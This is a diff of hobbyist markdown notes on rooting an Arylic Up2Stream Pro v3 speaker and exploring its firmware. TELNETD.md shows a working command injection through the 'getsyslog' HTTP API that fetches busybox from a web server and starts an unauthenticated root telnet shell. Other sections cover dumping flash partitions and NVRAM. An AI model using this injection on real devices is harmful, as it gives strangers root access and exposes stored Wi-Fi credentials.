diff --git a/Hardware.md b/Hardware.md index 08e72b2..b464763 100644 --- a/Hardware.md +++ b/Hardware.md @@ -1,4 +1,4 @@ -# Hardware +# Hardware and Firmware The specs for the Linkplay A31 module are as follows ``` # cat /proc/cpuinfo @@ -29,7 +29,7 @@ https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/ The binaries are included in packages, so you have to find out which packages includes a specific binary. A list of packages can be found here: https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/Packages -Here's an example how to download a package and get the binaries from it for a SSH server (dropbear): +Here's an example how to download a package and get the binaries from it for a SSH server (dropbear). The commands were executed from a terminal window on my MacBook: ``` cd ~/Downloads @@ -137,4 +137,23 @@ wget -O /tmp/file -T 5 'http://10.1.1.22/a31/file';/bin/chmod 777 /tmp/file # on Up2Stream device: wget -O /tmp/strings -T 5 'http://10.1.1.22/a31/strings';/bin/chmod 777 /tmp/strings +``` +Here are some code snippets from a script on the device (can't remember any details). It looks that the commands for NTP are not working anymore, also the commands to switch power for the WiFi interface off: +``` +srv=`nvram_get 2860 NTPServerIP` +sync=`nvram_get 2860 NTPSync` +tz=`nvram_get 2860 TZ` +nvram_set 2860 TZ + +nvram_set 2860 RadioOn 0 +nvram_set 2860 ApCliEnable 0 +--> blinking LED, but apcli0 and ra0 still enabled after reboot + +nvram_set 2860 TxPower 0 or 1 +--> no effect +``` +You can turn the WiFi interface and the internal access point off with the following commands: +``` +ifconfig ra0 down +ifconfig apcli0 down ``` \ No newline at end of file diff --git a/TELNETD.md b/TELNETD.md index 104394d..2aa63b5 100644 --- a/TELNETD.md +++ b/TELNETD.md @@ -5,23 +5,20 @@ The command that has this vulnerability is **_"getsyslog"_**, see https://develo The following code snippets are using the IP address 10.1.1.52 for my Arylic Up2Stream Pro v3 device and 10.1.1.22 for a web server running on my local MacBook. ``` -curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;/bin/chmod+777+/tmp/busybox;/tmp/busybox+telnetd+-l/bin/ash"; +curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash"; ``` The command above is executing the following commands on the device: ``` -wget -O /tmp/busybox -T 5 http://10.1.1.22/a31/busybox -q; -/bin/chmod 777 /tmp/busybox; -/tmp/busybox telnetd -l/bin/ash +wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/busybox -q; +chmod 777 /tmp/bin/busybox; +/tmp/bin/busybox telnetd -l/bin/ash ``` -The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere. A version of busybox is provided here: - -There is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need: -https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/ - -The binaries are included in packages +The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere. +A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section **_Hardware and Firmware_** for more information. +You may also redirect output and error output for telnetd: ``` -curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;wget+-O+/tmp/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;/bin/chmod+777+/tmp/busybox;/tmp/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;"; +curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;"; ``` diff --git a/boot-process.md b/boot-process.md index 909ef3e..564c266 100644 --- a/boot-process.md +++ b/boot-process.md @@ -50,29 +50,41 @@ https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/ and https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/ - -Example to download the tools from the OpenWRT version Chaos Calmer: ------------------------------------------------ -uboot-envtools_2014.10-2_ramips_24kec.ipk - +Here's an example how to download a package from the Open WRT archive and get the binaries from it to show the environment. The commands were executed from a terminal window on my MacBook: +``` +cd ~/Downloads +curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/base/uboot-envtools_2014.10-2_ramips_24kec.ipk' -o uboot-envtools_2014.10-2_ramips_24kec.ipk mkdir uboot-envtools_2014.10-2_ramips_24kec cd uboot-envtools_2014.10-2_ramips_24kec tar zxpvf ../uboot-envtools_2014.10-2_ramips_24kec.ipk tar zxpvf control.tar.gz tar zxpvf data.tar.gz - -wget -O /tmp/fw_printenv -T 5 'http://10.1.1.22/a31/fw_printenv';/bin/chmod 777 /tmp/fw_printenv -ln -s /tmp/fw_printenv /tmp/fw_setenv - +# copy dropbear binary to a subdirectory on your webserver +cp usr/sbin/fw_printenv /Library/WebServer/Documents/a31/ +# you may open finder to search for additional information in the package +open . +``` +In the next step you can you can download and install the tool on the Up2Stream device (telnetd already installed): +``` +cd /tmp +mkdir /tmp/bin +wget -O /tmp/bin/fw_printenv -T 5 'http://10.1.1.22/a31/fw_printenv' +chmod 777 /tmp/bin/fw_printenv +ln -s /tmp/bin/fw_printenv /tmp/bin/fw_setenv +``` +and the same for dmesg: +``` +cd ~/Downloads curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/base/dmesg_2.25.2-4_ramips_24kec.ipk' -o dmesg_2.25.2-4_ramips_24kec.ipk mkdir dmesg_2.25.2-4_ramips_24kec cd dmesg_2.25.2-4_ramips_24kec tar zxpvf ../dmesg_2.25.2-4_ramips_24kec.ipk tar zxpvf control.tar.gz tar zxpvf data.tar.gz -open . -# copy ./usr/sbin/dmesg to your webserver, e.g. /Library/WebServer/Documents/a31 -on Up2Stream device: +cp ./usr/sbin/dmesg /Library/WebServer/Documents/a31 +``` +Installit on the Up2Stream device and dig for some useful information: +``` wget -O /tmp/dmesg -T 5 'http://10.1.1.22/a31/dmesg';/bin/chmod 777 /tmp/dmesg cat /proc/version @@ -127,41 +139,37 @@ mtd9: 00200000 00010000 "user2" [ 0.700000] 0x000000d80000-0x000000e00000 : "user" [ 0.712000] 0x000000e00000-0x000001000000 : "user2" ... +``` +Install **_dd_** from busybox and **_scp_** from dropbear package (see **_Enable Telnet_** section to install **_busybox_** and **_Hardware and Firmware_** section to install **dropbear**), then +``` +# tools included in busybox just need a symbolic link with their name +ln -s /tmp/bin/busybox /tmp/bin/dd +## copy mtd1 to a file and save for future use +dd if=/dev/mtd1 of=/tmp/mtd1.img bs=512 count=128000 skip=0 +scp -v -S /tmp/bin/dbclient /tmp/mtd1.img pi@10.1.1.40:mtd1.img +rm /tmp/mtd1.img +``` +--> size 0x30000 = 196608 bytes. The command above tries to copy more data, so the whole mtd1 partition is copied. See **_cat /proc/mtd_** from above for details. -install dd from busybox and scp from dropbear package, then - -dd if=/dev/mtd1 of=/tmp/mtd1.cp bs=512 count=128000 skip=0 -scp -v -S /tmp/bin/dbclient /tmp/mtd1.cp pi@10.1.1.40:mtd1.cp -rm /tmp/mtd1.cp - ---> size 0x30000 = 196608 bytes. The command above tries to copy more data, so the whole mtd1 partition is copied. - -mtd1: 00030000 00010000 "Bootloader" - no environment variables -mtd2: 00010000 00010000 "Config" - from 0x2000 to 0x6000 -mtd3: 00010000 00010000 "Factory" -mtd4: 00200000 00010000 "bkKernel" -mtd5: 001df508 00010000 "Kernel" -mtd6: 00950af8 00010000 "RootFS" -mtd7: 00b30000 00010000 "Kernel_RootFS" -mtd8: 00080000 00010000 "user" -mtd9: 00200000 00010000 "user2" - -mkdir /var/lock - -create file /etc/fw_env.config -with +Create the file **_/etc/fw_env.config_** with the following content, e.g. with vi: +``` +cat <<\EOF > /etc/fw_env.config # MTD device name Device offset Env. size Flash sector size /dev/mtd2 0x02000 0x4000 0x4000 - -before setting the correct values: -/tmp/fw_printenv +EOF +mkdir /var/lock +``` +Before setting the correct values for the size the following error is shown: +``` +fw_printenv Warning: Bad CRC, using default environment bootcmd=bootp; setenv bootargs root=/dev/nfs nfsroot=${serverip}:${rootpath} ip=${ipaddr}:${serverip}:${gatewayip}:${netmask}:${hostname}::off; bootm bootdelay=5 baudrate=115200 - -with settings from above: -# fw_printenv +``` +With the correct settings from above you get a list with all environment variables. These values are stored in NVRAM, so they will survive a reboot: +``` +fw_printenv WebInit=1 HostName=wiimu OperationMode=3 @@ -369,26 +377,9 @@ ApCliAuthMode=WPA2PSK ApCliEncrypType=AES ApCliChannel=6 -# show contents of NVRAM +# a similar output will provide ralink_init show 2860 - ---> similar output - -code snippet from a script: -srv=`nvram_get 2860 NTPServerIP` -sync=`nvram_get 2860 NTPSync` -tz=`nvram_get 2860 TZ` -nvram_set 2860 TZ +``` -nvram_set 2860 RadioOn 0 -nvram_set 2860 ApCliEnable 0 - ---> blinking LED, but apcli0 and ra0 still enabled after reboot - -nvram_set 2860 TxPower 0 or 1 - ---> no effect - - The environment is usually at the end of the uboot partition.